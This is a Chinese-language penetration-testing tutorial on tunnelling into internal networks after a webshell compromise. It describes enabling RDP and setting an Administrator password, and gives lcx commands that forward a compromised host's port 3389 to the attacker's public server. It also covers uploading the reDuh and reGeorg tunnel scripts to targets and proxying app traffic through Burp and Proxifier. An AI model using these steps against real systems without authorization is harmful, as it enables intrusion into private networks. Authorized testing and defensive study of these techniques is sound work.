內網穿透方式 · 白帽與安全

# 內網穿透方式滲透測試過程中，經常會遇到以下場景：通過web腳本漏洞獲得了某web主機的system權限，甲方有進一步的內網滲透測試需求，以證明企業所面臨的巨大風險，這個時候就需要做內網的域滲透。 ## 零、NAT網絡地址轉換？網絡地址轉換（Network Address Translation，NAT）機制的問題在于，NAT設備自動屏蔽了非內網主機主動發起的連接，也就是說，從外網發往內網的數據包將被NAT設備丟棄，這使得位于不同NAT設備之后的主機之間無法直接交換信息。一方面保護了內網主機免于來自外部網絡的攻擊，另一方面也為P2P通信帶來了一定困難。外部主機要與內網主機相互通信，必須由內網主機主動發起連接，使 NAT設備產生一個映射條目，這就有必要研究一下內網穿透技術。 ## 1??在同一局域網下的遠程控制 *** 如果開啟了3389遠程登陸，那么直接遠程就好了 ①右擊我的電腦，選擇屬性后點擊遠程控制，點擊允許遠程控制此計算機，按win+R，輸入cmd進入dos，輸入ipconfig查看本機IP，由于遠程控制要求被控制電腦的賬戶有密碼，所以如果沒有設置賬戶密碼的話還要再dos下輸入net user Administrator XXX，XXX是你的密碼 >②在另一臺電腦上按win+R，輸入mstsc，再在彈出的頁面輸入被控制電腦的ip，然后再輸入用戶名Administrator和你剛才設置的密碼。 ![](https://upload-images.jianshu.io/upload_images/24055255-140cbdad1354b8dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) **??連接成功，測試一下發現幾乎沒有延遲，仿佛用的就是被控制的電腦，希望外網控制時也能這樣快。** ## 2??通信雙方一臺位于NAT 之后攻擊者這邊，要有一個有公網IP的服務器，以便接收反向連接 ### 第一：Webshell如何開啟3389服務 **①、通過修改注冊表開啟遠程終端** **詳情參考：** ??開啟3389常用終端命令篇章 **②、通過webshell上傳3389工具開啟遠程終端** ### 第二：如果服務器端口被修改如何查找？目前主要通過注冊表讀取、端口掃描、命令探針等三種方法查找修改后的端口。 ### 第三：如何遠程連接內網電腦? #### 1、通過lcx端口轉發 **概念：** 1. 首先內網中的主機一般都是使用的私有ip，在網絡出口處經過NAT轉換為公網ip后，才能訪問internet。 2. 所以，有時當我們進入網站后臺cmd，或者捕獲了一臺內網中的肉雞，是無法主動去鏈接這臺肉雞的，也不好在別人的路由器上做端口映射，這就體現lcx的作用了。 3. lcx實現端口轉發，將肉雞A上的某個端口(常用的3389)，轉發到具有公網地址的主機B上，這樣我們只需要連接主機B的3389端口就相當于連接到了肉雞A上，從而突破了內網私有ip的限制。 **步驟：** 1. 獲取webshell后：上傳一個cmd.exe文件和lck.exe，然后setp cmd.exe設置終端路徑解決運行權限問題。 2. Webshell上執行： ```cmd #將本機(肉雞)3389端口流量轉發到公網ip的2222端口上去 lcx.exe -slave 自己的公網ip 2222 127.0.0.1 3389 ``` 3. 自己的服務器里面執行： ```cmd # 監聽本地的2222端口將流量轉發到4444 lcx.exe -listen 2222 4444 ``` 4. 最后通過3389連接172.0.0.1:4444即可 #### 2、通過reDuh端口轉發腳本 **概念** ReDuh 是一個通過 HTTP 協議建立隧道傳輸各種其他數據的工具。其可以把內網服務器的端口通過 http/https 隧道轉發到本機，形成一個連通回路。用于目標服務器在內網或做了端口策略的情況下連接目標服務器內部開放端口。 **步驟：** 1. 將reDuh.php上傳到目標服務器 2. 在物理機成功訪問reDuh.php xxxx.com/reDuh.php 3. 打開客戶端reDuhGUI.exe，進行連接，然后就可以用3389進行連接了 ## 3??通信雙方均位于NAT設備之后使用reGeorg+Proxifier *** **概念** 有時候你路由器的ip并不是公網ip,也就是說你的路由器也是另一層局域網下的設備，這種情況下只對你的路由器進行端口映射然并卵，因為你始終拿不到最頂層路由ip。 **步驟：** 1. 將tunnel.nosocket.php上傳至目標主機 2. 通過網頁能正常訪問tunnel.nosocket.php后再打開reGeorgSocksProxy.py腳本文件進行配置 ```python \reGeorgSocksProxy.py -p? 9999 -u?http://192.168.0.102:8080/tunnel.nosocket.php ``` 3. 安裝Proxifier，并設置代理規則。除reGeorgSocksProxy.py外，其余都設置為通過代理 ![mark](http://noah-pic.oss-cn-chengdu.aliyuncs.com/pic/20210806/181238778.png) 4. 完成上述步驟后，即可訪問目標的內部網絡 ![](https://upload-images.jianshu.io/upload_images/21549033-712a5b3dce41d939.png?imageMogr2/auto-orient/strip|imageView2/2/w/1200) ## 補充：關于burp+Proxifier結合抓包如微信等有很多APP現在是防代理的或者黑名單防御，但是抓包中間加一個環節使用這個Proxifier軟件作為中間代理，就可以應對了，因為socks是很正規的 **方法** 1. 在電腦上裝模擬器 2. 把burp ca證書丟在模擬器里加載 3. 設置規則新建規則讓模擬器這個進程所有數據包走socks就可以了注意：結合使用的工具不要進行攔截，要選擇direct模式 4. 訪問驗證